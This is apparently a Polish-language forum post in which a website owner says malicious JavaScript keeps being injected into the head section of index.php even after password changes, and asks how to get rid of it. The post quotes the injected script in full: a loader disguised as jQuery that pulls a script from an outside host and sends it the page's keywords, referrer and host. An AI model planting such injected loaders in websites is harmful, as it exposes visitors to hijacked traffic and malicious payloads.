Walczę od jakiegoś czasu... co pewien czasu umieszcza mi w kodzie w index.php w sekcji head takie oto badziestwo : "<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="http://newsco.fr/js/jquery.min.php?c_utt=SWR2D2&c_utm='+encodeURICompo nent('http://newsco.fr/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>"

Zmieniałem hasła administratora, do serwera itd i dalej to samo... nie wiem może gdzieś jeszcze w innych plikach dodaje ... jak to badziewstwo usunąć na dobre ?